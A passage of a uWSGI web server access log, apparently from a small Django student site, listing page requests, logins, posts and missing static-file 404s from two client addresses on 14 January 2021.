Jan 14 12:52:30 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2304/3085] 180.160.48.43 () {38 vars in 887 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 32 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2305/3086] 180.160.48.43 () {38 vars in 871 bytes} [Thu Jan 14 12:52:30 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2306/3087] 180.160.48.43 () {38 vars in 819 bytes} [Thu Jan 14 12:52:30 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2307/3088] 180.160.48.43 () {38 vars in 817 bytes} [Thu Jan 14 12:52:30 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2308/3089] 180.160.48.43 () {40 vars in 935 bytes} [Thu Jan 14 12:52:33 2021] GET /announcement/ => generated 11798 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 15176|app: 0|req: 2309/3090] 180.160.48.43 () {38 vars in 883 bytes} [Thu Jan 14 12:52:33 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 15176|app: 0|req: 2310/3091] 180.160.48.43 () {38 vars in 852 bytes} [Thu Jan 14 12:52:33 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 12 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 15176|app: 0|req: 2311/3092] 180.160.48.43 () {38 vars in 896 bytes} [Thu Jan 14 12:52:33 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 15176|app: 0|req: 2312/3093] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:52:33 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 15176|app: 0|req: 2313/3094] 180.160.48.43 () {38 vars in 872 bytes} [Thu Jan 14 12:52:33 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 15176|app: 0|req: 2314/3095] 180.160.48.43 () {38 vars in 888 bytes} [Thu Jan 14 12:52:33 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 35 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 15176|app: 0|req: 2315/3096] 180.160.48.43 () {38 vars in 928 bytes} [Thu Jan 14 12:52:33 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 15176|app: 0|req: 2316/3097] 180.160.48.43 () {38 vars in 820 bytes} [Thu Jan 14 12:52:33 2021] GET /static/css/spinners.css => generated 3516 bytes in 13 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 15176|app: 0|req: 2317/3098] 180.160.48.43 () {38 vars in 818 bytes} [Thu Jan 14 12:52:33 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2318/3099] 180.160.48.43 () {40 vars in 930 bytes} [Thu Jan 14 12:52:50 2021] GET /single-an-4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2319/3100] 180.160.48.43 () {40 vars in 932 bytes} [Thu Jan 14 12:52:50 2021] GET /single-an-4/ => generated 3604 bytes in 6 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2320/3101] 219.228.146.135 () {40 vars in 917 bytes} [Thu Jan 14 12:52:50 2021] GET /single/2 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2321/3102] 219.228.146.135 () {40 vars in 919 bytes} [Thu Jan 14 12:52:50 2021] GET /single/2/ => generated 9514 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2322/3103] 219.228.146.135 () {40 vars in 919 bytes} [Thu Jan 14 12:53:00 2021] GET /single/4/ => generated 9392 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2323/3104] 180.160.48.43 () {38 vars in 863 bytes} [Thu Jan 14 12:53:00 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2324/3105] 180.160.48.43 () {48 vars in 1007 bytes} [Thu Jan 14 12:53:03 2021] POST /login/ => generated 27 bytes in 31 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2325/3106] 180.160.48.43 () {40 vars in 911 bytes} [Thu Jan 14 12:53:03 2021] GET /home/ => generated 10483 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2326/3107] 219.228.146.135 () {40 vars in 919 bytes} [Thu Jan 14 12:53:04 2021] GET /single/2/ => generated 9514 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2327/3108] 180.160.48.43 () {40 vars in 918 bytes} [Thu Jan 14 12:53:05 2021] GET /all-0-0-0 => generated 13672 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3109] 180.160.48.43 () {40 vars in 863 bytes} [Thu Jan 14 12:53:05 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3110] 180.160.48.43 () {40 vars in 861 bytes} [Thu Jan 14 12:53:05 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3111] 180.160.48.43 () {40 vars in 895 bytes} [Thu Jan 14 12:53:05 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3112] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:53:05 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3113] 180.160.48.43 () {40 vars in 927 bytes} [Thu Jan 14 12:53:05 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3114] 180.160.48.43 () {40 vars in 973 bytes} [Thu Jan 14 12:53:05 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3115] 180.160.48.43 () {40 vars in 912 bytes} [Thu Jan 14 12:53:05 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2328/3116] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:53:07 2021] GET /single/4/ => generated 9412 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2329/3117] 219.228.146.135 () {40 vars in 920 bytes} [Thu Jan 14 12:53:17 2021] GET /all-0-0-0 => generated 13652 bytes in 21 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3118] 219.228.146.135 () {40 vars in 901 bytes} [Thu Jan 14 12:53:17 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3119] 219.228.146.135 () {40 vars in 929 bytes} [Thu Jan 14 12:53:17 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3120] 219.228.146.135 () {40 vars in 975 bytes} [Thu Jan 14 12:53:17 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +0 +[] +[pid: 15176|app: 0|req: 2330/3121] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 12:54:09 2021] GET /all-3-0-0 => generated 9986 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +[] +[pid: 15176|app: 0|req: 2331/3122] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 12:54:10 2021] GET /all-4-0-0 => generated 9983 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +0 +0 +[, ] +[pid: 15176|app: 0|req: 2332/3123] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 12:54:12 2021] GET /all-5-0-0 => generated 10419 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +0 +[] +[pid: 15176|app: 0|req: 2333/3124] 219.228.146.135 () {40 vars in 924 bytes} [Thu Jan 14 12:54:15 2021] GET /all-6-0-0 => generated 9983 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2334/3125] 180.160.48.43 () {48 vars in 1102 bytes} [Thu Jan 14 12:54:52 2021] POST /single/4/ => generated 0 bytes in 31 msecs (HTTP/1.1 302) 7 headers in 202 bytes (2 switches on core 0) +[pid: 15176|app: 0|req: 2335/3126] 180.160.48.43 () {42 vars in 951 bytes} [Thu Jan 14 12:54:52 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2336/3127] 180.160.48.43 () {42 vars in 953 bytes} [Thu Jan 14 12:54:52 2021] GET /single/4/ => generated 9966 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3128] 180.160.48.43 () {38 vars in 850 bytes} [Thu Jan 14 12:54:52 2021] GET /static/img/r_photo/8_seeseeme.png => generated 7285 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2337/3129] 219.228.146.135 () {40 vars in 922 bytes} [Thu Jan 14 12:54:57 2021] GET /publish/ => generated 5234 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2338/3130] 180.160.48.43 () {48 vars in 1101 bytes} [Thu Jan 14 12:55:23 2021] POST /single/4/ => generated 0 bytes in 23 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2339/3131] 180.160.48.43 () {42 vars in 951 bytes} [Thu Jan 14 12:55:23 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2340/3132] 180.160.48.43 () {42 vars in 953 bytes} [Thu Jan 14 12:55:23 2021] GET /single/4/ => generated 10504 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3133] 180.160.48.43 () {40 vars in 905 bytes} [Thu Jan 14 12:55:23 2021] GET /static/img/r_photo/8_seeseeme.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2341/3134] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:56:55 2021] GET /all-0-0-0 => generated 13672 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3135] 180.160.48.43 () {40 vars in 927 bytes} [Thu Jan 14 12:56:55 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3136] 180.160.48.43 () {40 vars in 973 bytes} [Thu Jan 14 12:56:56 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2342/3137] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:57:03 2021] GET /single/4/ => generated 10504 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3138] 180.160.48.43 () {40 vars in 905 bytes} [Thu Jan 14 12:57:03 2021] GET /static/img/r_photo/8_seeseeme.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2343/3139] 180.160.48.43 () {48 vars in 1016 bytes} [Thu Jan 14 12:57:06 2021] POST /single/4/ => generated 27 bytes in 21 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2344/3140] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:57:06 2021] GET /single/4/ => generated 9966 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2345/3141] 219.228.146.135 () {40 vars in 922 bytes} [Thu Jan 14 13:00:37 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2346/3142] 180.160.48.43 () {48 vars in 1100 bytes} [Thu Jan 14 13:00:55 2021] POST /single/4/ => generated 0 bytes in 21 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2347/3143] 180.160.48.43 () {42 vars in 950 bytes} [Thu Jan 14 13:00:55 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2348/3144] 180.160.48.43 () {42 vars in 952 bytes} [Thu Jan 14 13:00:55 2021] GET /single/4/ => generated 10505 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3145] 180.160.48.43 () {40 vars in 904 bytes} [Thu Jan 14 13:00:55 2021] GET /static/img/r_photo/8_seeseeme.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2349/3146] 180.160.48.43 () {48 vars in 1015 bytes} [Thu Jan 14 13:00:59 2021] POST /single/4/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2350/3147] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 13:00:59 2021] GET /single/4/ => generated 9966 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2351/3148] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 13:01:01 2021] GET /all-0-0-0 => generated 13672 bytes in 39 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3149] 180.160.48.43 () {40 vars in 902 bytes} [Thu Jan 14 13:01:01 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3150] 180.160.48.43 () {40 vars in 898 bytes} [Thu Jan 14 13:01:02 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3151] 180.160.48.43 () {40 vars in 926 bytes} [Thu Jan 14 13:01:02 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3152] 180.160.48.43 () {40 vars in 972 bytes} [Thu Jan 14 13:01:02 2021] GET /static/img/t_photo/15_1_%E5%BE%AE%E4%BF%A1%E5%9B%BE%E7%89%87_20200630202102.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2352/3153] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 13:01:08 2021] GET /single/4/ => generated 9966 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2353/3154] 180.160.48.43 () {48 vars in 1100 bytes} [Thu Jan 14 13:01:16 2021] POST /single/4/ => generated 0 bytes in 19 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2354/3155] 180.160.48.43 () {42 vars in 950 bytes} [Thu Jan 14 13:01:16 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2355/3156] 180.160.48.43 () {42 vars in 952 bytes} [Thu Jan 14 13:01:16 2021] GET /single/4/ => generated 10505 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +期末什么时候过完 期末什么时候过完 +[pid: 15176|app: 0|req: 2356/3157] 219.228.146.135 () {48 vars in 1102 bytes} [Thu Jan 14 13:01:30 2021] POST /publish/ => generated 0 bytes in 23 msecs (HTTP/1.1 302) 7 headers in 203 bytes (6 switches on core 0) +[pid: 15176|app: 0|req: 2357/3158] 219.228.146.135 () {42 vars in 954 bytes} [Thu Jan 14 13:01:30 2021] GET /single/16 => generated 0 bytes in 2 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2358/3159] 219.228.146.135 () {42 vars in 956 bytes} [Thu Jan 14 13:01:30 2021] GET /single/16/ => generated 9374 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3160] 219.228.146.135 () {40 vars in 864 bytes} [Thu Jan 14 13:01:30 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3161] 219.228.146.135 () {40 vars in 862 bytes} [Thu Jan 14 13:01:30 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3162] 219.228.146.135 () {38 vars in 843 bytes} [Thu Jan 14 13:01:30 2021] GET /static/img/t_photo/16_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2359/3163] 219.228.146.135 () {40 vars in 938 bytes} [Thu Jan 14 13:01:41 2021] GET /ownpublish-0-0-0 => generated 10334 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3164] 219.228.146.135 () {40 vars in 905 bytes} [Thu Jan 14 13:01:41 2021] GET /static/img/t_photo/16_OIP.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2360/3165] 219.228.146.135 () {40 vars in 922 bytes} [Thu Jan 14 13:01:44 2021] GET /home/ => generated 10463 bytes in 11 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3166] 219.228.146.135 () {40 vars in 865 bytes} [Thu Jan 14 13:01:44 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3167] 219.228.146.135 () {40 vars in 860 bytes} [Thu Jan 14 13:01:44 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3168] 219.228.146.135 () {40 vars in 894 bytes} [Thu Jan 14 13:01:44 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2361/3169] 180.160.48.43 () {38 vars in 825 bytes} [Thu Jan 14 13:02:05 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3170] 180.160.48.43 () {40 vars in 814 bytes} [Thu Jan 14 13:02:05 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3171] 180.160.48.43 () {40 vars in 836 bytes} [Thu Jan 14 13:02:05 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3172] 180.160.48.43 () {40 vars in 818 bytes} [Thu Jan 14 13:02:05 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3173] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 13:02:05 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3174] 180.160.48.43 () {40 vars in 822 bytes} [Thu Jan 14 13:02:05 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3175] 180.160.48.43 () {40 vars in 797 bytes} [Thu Jan 14 13:02:05 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3176] 180.160.48.43 () {40 vars in 795 bytes} [Thu Jan 14 13:02:05 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3177] 180.160.48.43 () {40 vars in 813 bytes} [Thu Jan 14 13:02:05 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3178] 180.160.48.43 () {40 vars in 811 bytes} [Thu Jan 14 13:02:05 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3179] 180.160.48.43 () {40 vars in 803 bytes} [Thu Jan 14 13:02:05 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3180] 180.160.48.43 () {40 vars in 868 bytes} [Thu Jan 14 13:02:05 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2362/3181] 180.160.48.43 () {48 vars in 958 bytes} [Thu Jan 14 13:02:10 2021] POST /login/ => generated 27 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2363/3182] 180.160.48.43 () {40 vars in 873 bytes} [Thu Jan 14 13:02:11 2021] GET /home/ => generated 10477 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 15176|app: -1|req: -1/3183] 180.160.48.43 () {40 vars in 861 bytes} [Thu Jan 14 13:02:11 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3184] 180.160.48.43 () {40 vars in 855 bytes} [Thu Jan 14 13:02:11 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: -1|req: -1/3185] 180.160.48.43 () {40 vars in 874 bytes} [Thu Jan 14 13:02:12 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 15176|app: 0|req: 2364/3186] 180.160.48.43 () {40 vars in 880 bytes} [Thu Jan 14 13:02:13 2021] GET /single/4/ => generated 10499 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: -1|req: -1/3187] 180.160.48.43 () {40 vars in 814 bytes} [Thu Jan 14 13:02:13 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3188] 180.160.48.43 () {40 vars in 812 bytes} [Thu Jan 14 13:02:13 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3189] 180.160.48.43 () {38 vars in 812 bytes} [Thu Jan 14 13:02:13 2021] GET /static/img/r_photo/8_seeseeme.png => generated 7285 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: -1|req: -1/3190] 180.160.48.43 () {38 vars in 804 bytes} [Thu Jan 14 13:02:13 2021] GET /static/img/t_photo/hungry.png => generated 1713 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 15176|app: 0|req: 2365/3191] 180.160.48.43 () {48 vars in 1063 bytes} [Thu Jan 14 13:02:19 2021] POST /single/4/ => generated 0 bytes in 21 msecs (HTTP/1.1 302) 7 headers in 202 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2366/3192] 180.160.48.43 () {42 vars in 913 bytes} [Thu Jan 14 13:02:19 2021] GET /single/4 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2367/3193] 180.160.48.43 () {42 vars in 915 bytes} [Thu Jan 14 13:02:19 2021] GET /single/4/ => generated 11032 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 15176|app: 0|req: 2368/3194] 180.160.48.43 () {48 vars in 967 bytes} [Thu Jan 14 13:02:22 2021] POST /single/4/ => generated 27 bytes in 12 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 1) +[pid: 15176|app: 0|req: 2369/3195] 180.160.48.43 () {40 